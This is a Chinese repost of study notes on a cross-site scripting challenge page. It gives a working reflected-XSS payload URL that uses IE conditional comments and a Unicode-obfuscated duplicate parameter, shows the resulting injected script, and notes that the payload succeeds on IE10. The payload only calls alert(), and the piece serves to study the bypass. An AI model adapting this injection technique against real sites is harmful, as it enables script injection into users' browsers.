来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] 正常页面:http://sdl.me/challenge1/xss3/JsChallenge3.asp?input1=SomethinghtmlheadSCRIPT language=Javascriptfunction setid(id, name){if (document.getElementById(#39;Something#39;).val......
|
正常页面:
http://sdl.me/challenge1/xss3/JsChallenge3.asp?input1=Something
<html>
<head>
<SCRIPT language="Javascript">
function setid(id, name)
{
if (document.getElementById('Something').value > 10) {
document.getElementById('Something').value = id;
}else if (document.getElementById('Something').value > 0) {
document.getElementById('test2').name = name;
}
self.close();
}
//-->
</script>
</head>
<body>
……
http://sdl.me/challenge1/xss3/JsChallenge3.asp?Input1=*/alert%28%22@kinugawamasato%20and%20@irsdl%22%29;{{//%20@end%20@*//*%27%29%29;};{1&in%u2119ut1=1}/*@cc_on%20@if%281%291;@else
http://sdl.me/challenge1/xss3/JsChallenge3.asp?Input1=*/alert(“@kinugawamasato and @irsdl”);{{// @end @*//*’));};{1&inℙut1=1}/*@cc_on @if(1)1;@else
<SCRIPT language="Javascript">
function setid(id, name)
{
if (document.getElementById('*/alert("@kinugawamasato and @irsdl");{{// @end @*//*'));};{1, 1}/*@cc_on @if(1)1;@else').value > 10) {
document.getElementById('*/alert("@kinugawamasato and @irsdl");{{// @end @*//*'));};{1, 1}/*@cc_on @if(1)1;@else').value = id;
}else if (document.getElementById('*/alert("@kinugawamasato and @irsdl");{{// @end @*//*'));};{1, 1}/*@cc_on @if(1)1;@else').value > 0) {
document.getElementById('test2').name = name;
}
self.close();
}
//-->
</script>
在IE10上确实成功了,但还没弄明白什么情况……其最后根本也没闭合注释符 */
其它浏览器,Firefox,Chrome均不成功。
其中在URL中用到了%u2119 编码……
待解释。
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
